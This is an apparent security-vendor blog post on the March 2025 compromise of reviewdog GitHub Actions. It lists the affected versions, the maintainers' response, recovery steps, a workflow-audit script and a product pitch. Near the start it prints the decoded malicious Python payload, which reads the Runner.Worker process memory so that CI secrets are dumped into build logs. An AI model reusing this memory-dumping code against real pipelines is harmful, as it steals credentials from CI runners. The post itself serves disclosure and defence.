
reviewdog GitHub Actions are compromised

This story is still developing. There is conclusive evidence that many reviewdog Actions are compromised.
Varun Sharma

March 18, 2025


Overview

We are still investigating this security incident. Independent researcher Adnan Khan has shared conclusive evidence that several reviewdog Actions served malicious code in the past. Wiz also published a research blog on this incident on the same day. As there is no public evidence of recovery, it might be safe to assume that these Actions can get compromised again.

Update 1: March 18, 2025 09:00 PM: The maintainer has taken corrective steps to recover from the incident and published a summary. The compromise time period was between March 11, 2025 18:42 and 20:31 UTC. More details are provided in the Maintainer’s Response section below.

Summary of the incident

Independent researcher Adnan Khan disclosed the incident via a tweet on Monday, March 17, at 01:00 AM UTC.

The researcher identified a sample workflow in which the malicious Action version was executed. The screenshot below shows that during this run, the reviewdog/action-setup@v1 tag referenced commit SHA f0d342d24037bb11d26b9bd8496e0808ba32e9ec.

This commit contains the exploit payload, base64-encoded:

https://github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ec

The decoded payload is given below:

#!/usr/bin/env python3

# based on https://davidebove.com/blog/?p=1620

import sys
import os
import re


def get_pid():
    # https://stackoverflow.com/questions/2703640/process-list-on-linux-via-python
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]

    for pid in pids:
        with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
            if b'Runner.Worker' in cmdline_f.read():
                return pid

    raise Exception('Can not get pid of Runner.Worker')


if __name__ == "__main__":
    pid = get_pid()
    print(pid)

    map_path = f"/proc/{pid}/maps"
    mem_path = f"/proc/{pid}/mem"

    with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
        for line in map_f.readlines():  # for each mapped region
            m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
            if m.group(3) == 'r':  # readable region
                start = int(m.group(1), 16)
                end = int(m.group(2), 16)
                # hotfix: OverflowError: Python int too large to convert to C long
                # 18446744073699065856
                if start > sys.maxsize:
                    continue
                mem_f.seek(start)  # seek to region start
            
                try:
                    chunk = mem_f.read(end - start)  # read region contents
                    sys.stdout.buffer.write(chunk)
                except OSError:
                    continue

This payload, similar to the tj-actions/changed-files incident, accesses the Runner.Worker process memory to steal GitHub Actions secrets. The exfiltrated secrets are subsequently printed in the GitHub Actions workflow logs. The following screenshot from the sample run shows the dumped secrets within the build logs.

This GitHub code search in the reviewdog organization shows that a few other composite Actions depend on the reviewdog/action-setup Action. The composite reviewdog Actions that use reviewdog/action-setup are listed below.

1. reviewdog/action-shellcheck
2. reviewdog/action-composite-template
3. reviewdog/action-staticcheck
4. reviewdog/action-ast-grep
5. reviewdog/action-typos

As reviewdog/action-setup is compromised, it is safe to assume that at least the Actions listed above in the reviewdog organization are also compromised.

Maintainer’s Response

Incident Background

The maintainers of the reviewdog GitHub Actions have acknowledged the security breach and provided additional details about the compromise. According to their investigation, the attack targeted reviewdog/action-setup@v1, potentially leading to the compromise of other widely used GitHub Actions, including tj-actions/changed-files. As a result, repositories using these actions may have inadvertently leaked sensitive information.

The compromise occurred on March 11, 2025, between 18:42 and 20:31 UTC.

How Did the Attack Happen?

The attacker managed to push malicious code to the v1 tag of reviewdog/action-setup. The reviewdog organization’s contributor management process appears to have played a role in this incident. Contributors to reviewdog/action-* repositories were automatically invited to a maintainer team that had write access to these repositories. At the time of the attack, this team had 118 members, increasing the likelihood of an account being compromised.

While the exact method of exploitation is still under investigation, the maintainers suspect the attacker either compromised an existing contributor’s account or gained write access through the automated invitation process. The reviewdog maintainers have clarified that contributors did not have write access to the main reviewdog repository or core projects such as errorformat.

Impacted GitHub Actions

The following reviewdog actions have been identified as affected:

  • reviewdog/action-setup@v1 (other tags may also be impacted, though no evidence has been found)
  • reviewdog/action-shellcheck@{<v1.29.2}
  • reviewdog/action-composite-template@{<v0.20.2}
  • reviewdog/action-staticcheck@{<v1.26.2}
  • reviewdog/action-ast-grep@{<v1.26.2}
  • reviewdog/action-typos@{<v1.17.2}

There is a possibility that other reviewdog actions may also be impacted, though no additional evidence has been found so far.

Actions Taken by the Maintainers

In response to the breach, the maintainers have implemented several security measures:

  • Disabled the automated contributor invitation workflow to prevent unauthorized access.
  • Revoked write access for most contributors, restricting it to a small group of trusted maintainers.
  • Updated all reviewdog repositories to explicitly reference GitHub Actions by commit SHA instead of version tags.
  • Pinned reviewdog binary installation scripts using commit SHAs.
  • Reviewed security logs and found no suspicious activity related to their maintainer and bot accounts.
  • Rotated or revoked Personal Access Tokens (PATs) associated with maintainer and bot accounts.

Recovery steps

🚨 If you are using any of the following Actions from the reviewdog organization, we strongly recommend that you stop using them immediately until the incident is resolved.

1. reviewdog/action-setup
2. reviewdog/action-shellcheck
3. reviewdog/action-composite-template
4. reviewdog/action-staticcheck
5. reviewdog/action-ast-grep
6. reviewdog/action-typos

If possible, stop using all reviewdog Actions until the impact of the incident is clear.

Review Actions Inventory

You should perform a code search across your repositories to discover all instances of the reviewdog Actions. For example, the following GitHub search URL shows this information for the actions GitHub organization:

https://github.com/search?q=org%3Aactions+reviewdog&type=code

Note that GitHub code search does not always return complete results. If you have a dedicated source code search solution such as Sourcegraph, it may be more effective at finding all instances of these Actions in use.
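As an added example (not code from this post, from StepSecurity, or from the reviewdog project), the following Python script audits workflow files against the impacted-version list from the Maintainer’s Response section and the malicious commit SHA named above. The workflow text is a constructed sample, and the status labels ("compromised", "review", "ok") are this example's own convention.

```python
import re
AFFECTED = {  # fixed releases from the maintainers' list; None = every tag affected
    "reviewdog/action-setup": None,
    "reviewdog/action-shellcheck": (1, 29, 2),
    "reviewdog/action-composite-template": (0, 20, 2),
    "reviewdog/action-staticcheck": (1, 26, 2),
    "reviewdog/action-ast-grep": (1, 26, 2),
    "reviewdog/action-typos": (1, 17, 2),
}
MALICIOUS_SHA = "f0d342d24037bb11d26b9bd8496e0808ba32e9ec"  # commit named in the post
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([\w.-]+/[\w./-]+)@([^\s'\"#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")

def parse_version(ref):
    """'v1.29.1' -> (1, 29, 1); 'v1' -> (1,), i.e. floating; 'main' -> None."""
    m = re.match(r"^v?(\d+)(?:\.(\d+))?(?:\.(\d+))?$", ref)
    return tuple(int(g) for g in m.groups() if g is not None) if m else None
def classify(action, ref):
    """Return (status, reason) for one `uses: action@ref` reference."""
    if not action.startswith("reviewdog/"):
        return "ok", "not a reviewdog Action"
    if action not in AFFECTED:
        return "review", "reviewdog Action not on the published list; pause until impact is clear"
    if SHA_RE.match(ref):
        if ref == MALICIOUS_SHA:
            return "compromised", "pinned to the known malicious commit"
        return "review", "pinned to a commit; confirm it is not from the compromise window"
    fixed, ver = AFFECTED[action], parse_version(ref)
    if fixed is None:
        return "compromised", "every tag of reviewdog/action-setup is treated as affected"
    if ver is None or len(ver) < 3:  # floating tag (v1, v1.29) or branch name
        return "compromised", f"{ref} may have resolved to an affected release"
    if ver < fixed:
        return "compromised", f"{ref} is older than fixed release v{'.'.join(map(str, fixed))}"
    return "ok", f"{ref} is at or above the fixed release"
def audit_workflow(text):
    """Scan workflow YAML text; return [(line_no, action, ref, status, reason), ...]."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if m and m.group(1).startswith("reviewdog/"):
            findings.append((n, m.group(1), m.group(2), *classify(m.group(1), m.group(2))))
    return findings
SAMPLE_WORKFLOW = """\
      - uses: actions/checkout@v4
      - uses: reviewdog/action-setup@f0d342d24037bb11d26b9bd8496e0808ba32e9ec
      - uses: reviewdog/action-shellcheck@v1.29.1
      - uses: reviewdog/action-shellcheck@v1
      - uses: reviewdog/action-typos@v1.17.2
"""  # constructed sample, not from any real repository
```

Run `audit_workflow` over each file under `.github/workflows/` and treat any "compromised" or "review" finding as a repository whose recent run logs need the secret-leak review described in the next section.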

Review GitHub Actions Workflow Run Logs

You should review the logs of recent executions of reviewdog Actions to see whether they have leaked secrets. Below is an example of how leaked secrets appear in build logs.

This step is especially important for public repositories since their logs are publicly accessible.

Rotate Leaked Secrets

If you discover any secrets in GitHub Actions workflow run logs, rotate them immediately.

For StepSecurity Enterprise Customers

The following steps are applicable only to StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14-day free trial by installing the StepSecurity GitHub App to complete the following recovery steps.

Discover Leaked Secrets

We have added a new control specifically to detect leaked secrets in build logs due to this security incident. You can find the new control on the StepSecurity dashboard.

Review Actions Inventory

You can use the Actions inventory feature to discover all GitHub Actions workflows that are using reviewdog Actions.

Use the StepSecurity maintained reviewdog/action-setup Action

StepSecurity Maintained Actions are usually exclusive to StepSecurity enterprise customers.

To use the StepSecurity maintained Action for reviewdog/action-setup, replace all instances of "reviewdog/action-setup@vx" with "step-security/reviewdog-action-setup@v1".

For enhanced security, you can pin to the specific commit SHA instead: "step-security/reviewdog-action-setup@fab6de28ae8bc2a032c9e655d990afa450edb995 # v1.3.2".

For more details, please refer to the README of the project.

Next Steps

This incident is still developing. We will continue to monitor the situation and provide updates as more information becomes available.

🚨 More Supply Chain Attacks Could Follow

With credentials leaked in both the tj-actions compromise and this reviewdog incident, other supply chain attacks may already have occurred or could happen soon. Attackers could reuse leaked credentials to compromise additional GitHub Actions, making it critical to secure your CI/CD pipelines proactively.
